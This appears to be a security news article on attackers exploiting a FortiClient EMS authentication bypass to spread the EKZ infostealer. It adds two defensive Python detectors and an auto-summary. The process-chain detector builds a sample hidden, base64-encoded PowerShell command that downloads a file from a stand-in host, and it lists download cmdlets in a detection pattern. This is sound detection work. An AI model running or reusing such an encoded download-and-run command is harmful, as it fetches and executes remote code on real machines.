LmCast :: Stay tuned in

Hackers exploit FortiClient EMS flaw to push infostealer malware

Recorded: May 28, 2026, 6:03 p.m.

Hackers exploit FortiClient EMS flaw to push infostealer malware

By Bill Toulas

May 28, 2026
01:25 PM

Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.
The attacker disguised the malware as an update for Fortinet endpoints and executed it through VPN scripting workflows managed by FortiClient.
The exploited critical vulnerability is an improper access control flaw that allows unauthenticated remote attackers to execute arbitrary code or commands via specially crafted requests.
Fortinet confirmed in early April that it was being exploited and released emergency hotfixes for versions 7.4.5 and 7.4.6 of the product.
CISA reacted quickly to the malicious activity and ordered federal agencies to secure their instances by the end of that week, while the internet security watchdog group The Shadowserver Foundation reported at the time that it was seeing 2,000 internet-exposed EMS instances.
Earlier this month, cybersecurity company Arctic Wolf observed attacks leveraging the vulnerability to deliver the EKZ infostealer. The researchers note that the intrusion begins with abusing endpoint APIs to perform administrative actions without authentication.
The attacker then modifies the EMS configuration and VPN policies to introduce the execution of malicious scripts. Seconds after endpoints established an IPsec tunnel to a FortiGate firewall, the legitimate fortitray.exe launched malicious batch scripts through Command Prompt.
Those scripts executed a base64-encoded PowerShell payload that downloaded and ran malware disguised as a Fortinet patch, then exfiltrated data to an attacker-controlled VPS over HTTP.
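To show what the process chain described above looks like from the defender's side, here is an added example that is not from the article or from Arctic Wolf's report. It runs over constructed process-creation events modelled on the fields a Sysmon Event ID 1 or EDR record carries (pid, parent pid, image path, command line), walks the parent chain back from each PowerShell process, flags chains that pass through FortiTray.exe and cmd.exe, and decodes any `-EncodedCommand` argument (base64 of UTF-16LE text) so the script can be inspected. The paths, pids and the encoded sample script are assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional


# Constructed process-creation events modelled on Sysmon Event ID 1 / EDR fields.
# Names, pids and command lines are made up for this example.
@dataclass
class ProcEvent:
    ts: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str


# Hypothetical script used only to build a sample -EncodedCommand argument;
# the real payload from the report is not reproduced here.
SAMPLE_SCRIPT = "Invoke-WebRequest -Uri https://updates.example.invalid/patch.exe -OutFile $env:TEMP\\patch.exe"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(datetime(2026, 5, 10, 9, 0, 0), 4100, 1,
              r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe", "FortiTray.exe"),
    ProcEvent(datetime(2026, 5, 10, 9, 0, 5), 4220, 4100,
              r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\ProgramData\update.bat"'),
    ProcEvent(datetime(2026, 5, 10, 9, 0, 6), 4300, 4220,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {SAMPLE_ENCODED}"),
    # Benign comparison: an interactive PowerShell started from Explorer.
    ProcEvent(datetime(2026, 5, 10, 9, 1, 0), 5000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(datetime(2026, 5, 10, 9, 1, 2), 5100, 5000,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
]

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_RE = re.compile(r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
# Cmdlets/methods commonly used to fetch and launch a second stage.
DOWNLOAD_RE = re.compile(r"(?i)Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer|Start-Process")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image basenames from the oldest known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def find_suspicious_chains(events: List[ProcEvent]) -> List[Dict]:
    """Flag PowerShell whose ancestry includes FortiTray.exe and cmd.exe; decode any encoded command."""
    findings = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        chain = ancestry(events, e.pid)
        if "fortitray.exe" not in chain or "cmd.exe" not in chain:
            continue
        decoded = decode_encoded_command(e.cmdline)
        findings.append({
            "pid": e.pid,
            "chain": chain,
            "decoded": decoded,
            "downloads": bool(decoded and DOWNLOAD_RE.search(decoded)),
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f["pid"], " -> ".join(f["chain"]), "| fetches a second stage:", f["downloads"])
```

The ancestry walk stops at the first pid it has no record for, so the check tolerates a launcher between cmd.exe and PowerShell; a benign PowerShell under explorer.exe is left alone.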

[Image: Malicious PowerShell code. Source: Arctic Wolf]
“Rather than relying on a generic malware lure, the payload was presented as a Fortinet endpoint update and executed through FortiClient-managed VPN scripting workflows,” reads the report from Arctic Wolf.
“On affected endpoints, FortiClient components launched command scripts that invoked PowerShell, downloaded a credential stealer, executed it silently, and exfiltrated harvested browser data before removing local artifacts.”
The downloaded payload, tracked as EKZ Infostealer, features fairly standard information-stealing functionality. It targets both Chromium-based and Firefox web browsers and extracts stored data to text files while bypassing encrypted password protections.

[Image: Stealer executes without arguments. Source: Arctic Wolf]
The malware targets credentials, credit card details, addresses, phone numbers, and cookies; stolen cookies can give access to accounts protected by multi-factor authentication without logging in.
According to Arctic Wolf, one indication of an exploitation attempt in attacks delivering the EKZ infostealer is the presence in the logs of the line "Certificate not found in request header." In lab tests, the error was followed within seconds by another entry: "Certificate user: fortinet-ca2 … successfully updated".
As such, the researchers recommend defenders look for certificate-authentication anomalies and unexpected changes to Remote Access Profile configurations.
Any suspicious administrative activity, such as new accounts, logins with an unfamiliar origin (Tor, VPS IP addresses), or actions leading to configuration changes, should be considered red flags.
Arctic Wolf's report provides extensive detection guidance that could help organizations prevent the observed attacks.
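The log sequence described above (a "Certificate not found in request header" entry followed within seconds by a "Certificate user: … successfully updated" entry) is easy to turn into a correlation check. Here is an added example, not from the article or from Arctic Wolf's report, that parses a constructed log excerpt and reports each update that lands within a configurable window of a missing-certificate error. The `<ISO timestamp> <message>` layout is an assumption, since the article does not show the real EMS log format, and the text the report elides between "fortinet-ca2" and "successfully updated" is replaced by a placeholder.

```python
import re
from datetime import datetime
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed log excerpt in an assumed "<ISO timestamp> <message>" layout.
# "<elided>" stands in for the part of the message the report leaves out.
SAMPLE_LOG = """\
2026-05-10T12:00:01Z Certificate not found in request header
2026-05-10T12:00:03Z Certificate user: fortinet-ca2 <elided> successfully updated
2026-05-10T12:05:00Z Certificate user: fortinet-ca2 <elided> successfully updated
2026-05-10T13:00:00Z Certificate not found in request header
2026-05-10T13:10:00Z Certificate user: fortinet-ca2 <elided> successfully updated
"""

MISSING_CERT = "Certificate not found in request header"
CERT_UPDATED_RE = re.compile(r"^Certificate user: (\S+) .*successfully updated")
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z?\s+(.*)$")


def parse_log(text: str) -> Iterator[Tuple[datetime, str]]:
    """Yield (timestamp, message) for each line that matches the assumed layout."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S"), m.group(2)


def find_cert_anomalies(text: str, window_seconds: float = 30.0) -> List[Dict]:
    """Return each 'successfully updated' entry that follows a 'not found' entry within the window."""
    hits: List[Dict] = []
    pending: Optional[datetime] = None  # most recent unmatched "not found" timestamp
    for ts, msg in parse_log(text):
        if msg == MISSING_CERT:
            pending = ts
            continue
        m = CERT_UPDATED_RE.match(msg)
        if not m:
            continue
        if pending is not None:
            gap = (ts - pending).total_seconds()
            if 0 <= gap <= window_seconds:
                hits.append({"user": m.group(1), "gap_seconds": gap, "at": ts.isoformat()})
            # An update, flagged or not, consumes the pending error so a stale
            # error does not pair with a later routine update.
            pending = None
    return hits


if __name__ == "__main__":
    for h in find_cert_anomalies(SAMPLE_LOG):
        print(f"{h['at']}: certificate for {h['user']} updated {h['gap_seconds']:.0f}s after a missing-certificate error")
```

With the default 30-second window only the first pair in the sample is reported; the update at 12:05 has no preceding error and the 13:00/13:10 pair is ten minutes apart. The window is a tuning knob: widen it when correlating across busy logs, at the cost of more routine re-enrolments being flagged.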


Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Summarized

Hackers successfully exploited an authentication bypass vulnerability, specifically CVE-2026-35616, within the FortiClient Enterprise Management Server (EMS) to deploy an undocumented credential stealer known as EKZ. This vulnerability stemmed from an improper access control flaw that permitted unauthenticated remote attackers to execute arbitrary code or commands through specially crafted requests. Fortinet acknowledged this exploitation and released emergency hotfixes for versions 7.4.5 and 7.4.6 of the product. The malicious activity was observed by cybersecurity researchers, including Arctic Wolf, who noted that the intrusion began by abusing endpoint APIs to perform administrative actions without proper authentication.

The attackers leveraged this access to modify the EMS configuration and VPN policies to introduce the execution of malicious scripts. The exploitation pathway demonstrated a multi-stage attack: immediately following the establishment of an IPsec tunnel to a FortiGate firewall, legitimate components like fortitray.exe were used to launch malicious batch scripts via the Command Prompt. These scripts subsequently executed a base64-encoded PowerShell payload designed to download and run malware disguised as a Fortinet endpoint update. This process allowed the payload, tracked as the EKZ Infostealer, to exfiltrate data to an attacker-controlled Virtual Private Server over HTTP.

Rather than relying on a generic malware lure, the payload was presented as a Fortinet endpoint update executed through FortiClient-managed VPN scripting workflows. On affected endpoints, the FortiClient components initiated command scripts that invoked PowerShell, which in turn downloaded the stealer, executed it silently, and exfiltrated harvested data before removing local artifacts. The EKZ Infostealer performs standard information-stealing functions, targeting data from both Chromium-based and Firefox web browsers and extracting stored data into text files while bypassing encrypted password protections. It targets sensitive information including credentials, credit card details, addresses, phone numbers, and cookies, the last of which can give attackers access to accounts protected by multi-factor authentication without logging in.

Researchers indicated that a specific indicator of this exploitation attempt involves anomalous certificate behavior, noting the sequence where an error message regarding a missing certificate was followed immediately by a successful certificate update within seconds, suggesting system manipulation. Therefore, defenders are advised to scrutinize certificate-authentication anomalies and any unexpected alterations to Remote Access Profile configurations. Furthermore, detecting suspicious administrative activity, such as the creation of new accounts or logins originating from unfamiliar sources like Tor or Virtual Private Server IP addresses, should be treated as critical red flags. Arctic Wolf provided extensive detection guidance derived from their findings to aid organizations in preventing similar attacks.